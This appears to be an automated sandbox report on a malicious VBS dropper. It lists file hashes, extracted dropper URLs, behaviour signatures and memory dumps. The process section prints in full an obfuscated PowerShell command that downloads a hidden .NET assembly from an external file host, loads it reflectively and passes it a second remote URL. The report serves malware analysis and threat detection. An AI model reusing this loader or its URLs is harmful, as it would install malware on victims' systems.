Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    28-11-2024 07:39

General

  • Target

    createdbestthignswihtentiretimegivenmebestforever.vbs

  • Size

    150KB

  • MD5

    3703614d7a8cee78abec953fcb0971b6

  • SHA1

    8bf58afd59612f71f4d767f402f166122a4b3470

  • SHA256

    9c4b12f92fbde8c79f404703fe07576dc3b9a1a30052251e59dbc5d547dffc93

  • SHA512

    25493a97a739389b11014bcb5d0c5a8c0cdc178e62594582c40ab13acf1654713108c75d9273172f7883dcc19e27ffe9803ea818e0c3ef3546a17d5e6a45bf02

  • SSDEEP

    3072:OSkcclGF+6kr/vfxM1MheSkcclGF+6kr/vfxM1MheSkcclGF+6kr/vfxM1Mh6:FkoF+7fx8MnkoF+7fx8MTkoF+7fx8MI

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://3012.filemail.com/api/file/get?filekey=OF0gFcxMQCUwPYleTyb2Yh9aBTpRl9_K_LOoTKArK4ipMrH8N0jibXrPYJoFvjqaK50qGw&track=krUNywEJ&skipreg=true&pk_vid=a6a926643893714e17327089141d9432

exe.dropper

https://3012.filemail.com/api/file/get?filekey=OF0gFcxMQCUwPYleTyb2Yh9aBTpRl9_K_LOoTKArK4ipMrH8N0jibXrPYJoFvjqaK50qGw&track=krUNywEJ&skipreg=true&pk_vid=a6a926643893714e17327089141d9432

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\createdbestthignswihtentiretimegivenmebestforever.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2888
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $desprover = 'JGxhc2lhbnRoZXJhID0gJ2h0dHBzOi8vMzAxMi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9T0YwZ0ZjeE1RQ1V3UFlsZVR5YjJZaDlhQlRwUmw5X0tfTE9vVEtBcks0aXBNckg4TjBqaWJYclBZSm9GdmpxYUs1MHFHdyZ0cmFjaz1rclVOeXdFSiZza2lwcmVnPXRydWUmcGtfdmlkPWE2YTkyNjY0Mzg5MzcxNGUxNzMyNzA4OTE0MWQ5NDMyICc7JGVuZ29tYXIgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRyZXNvID0gJGVuZ29tYXIuRG93bmxvYWREYXRhKCRsYXNpYW50aGVyYSk7JGFmcmFnYXIgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcmVzbyk7JGJ1ZmlkbyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskZXN0ZW5kYXJpYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGFzbmFtZW50byA9ICRhZnJhZ2FyLkluZGV4T2YoJGJ1Zmlkbyk7JHRyaWJ1bCA9ICRhZnJhZ2FyLkluZGV4T2YoJGVzdGVuZGFyaWEpOyRhc25hbWVudG8gLWdlIDAgLWFuZCAkdHJpYnVsIC1ndCAkYXNuYW1lbnRvOyRhc25hbWVudG8gKz0gJGJ1Zmlkby5MZW5ndGg7JHJhbmNhdHJpbGhhID0gJHRyaWJ1bCAtICRhc25hbWVudG87JGx1cmdvID0gJGFmcmFnYXIuU3Vic3RyaW5nKCRhc25hbWVudG8sICRyYW5jYXRyaWxoYSk7JHRhbGlzY2EgPSAtam9pbiAoJGx1cmdvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRsdXJnby5MZW5ndGgpXTskbHVmYWRhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdGFsaXNjYSk7JGluY29udGFtaW5hZG8gPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRsdWZhZGEpOyRmb2xpZm9ybWUgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskZm9saWZvcm1lLkludm9rZSgkbnVsbCwgQCgndHh0LkZHVlZGR1IvOTA4LzY2MS41NzEuMjMyLjI3MS8vOnB0dGgnLCAnJHN1c3RvJywgJyRzdXN0bycsICckc3VzdG8nLCAnQ2FzUG9sJywgJyRzdXN0bycsICckc3VzdG8nLCckc3VzdG8nLCckc3VzdG8nLCckc3VzdG8nLCckc3VzdG8nLCckc3VzdG8nLCcxJywnJHN1c3RvJykpOw==';$lavajo = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($desprover));Invoke-Expression $lavajo
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2464

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Cab6F68.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\Tar6F9A.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • memory/2464-8-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

    Filesize

    9.6MB

  • memory/2464-5-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

    Filesize

    2.9MB

  • memory/2464-4-0x000007FEF544E000-0x000007FEF544F000-memory.dmp

    Filesize

    4KB

  • memory/2464-9-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

    Filesize

    9.6MB

  • memory/2464-10-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

    Filesize

    9.6MB

  • memory/2464-11-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

    Filesize

    9.6MB

  • memory/2464-7-0x00000000022A0000-0x00000000022A8000-memory.dmp

    Filesize

    32KB

  • memory/2464-6-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

    Filesize

    9.6MB

  • memory/2464-46-0x000007FEF544E000-0x000007FEF544F000-memory.dmp

    Filesize

    4KB

  • memory/2464-47-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

    Filesize

    9.6MB

  • memory/2464-48-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

    Filesize

    9.6MB

  • memory/2464-49-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

    Filesize

    9.6MB

  • memory/2464-51-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

    Filesize

    9.6MB

  • memory/2464-50-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

    Filesize

    9.6MB

  • memory/2464-53-0x000000001AD20000-0x000000001AE78000-memory.dmp

    Filesize

    1.3MB

  • memory/2464-54-0x000007FEF5190000-0x000007FEF5B2D000-memory.dmp

    Filesize

    9.6MB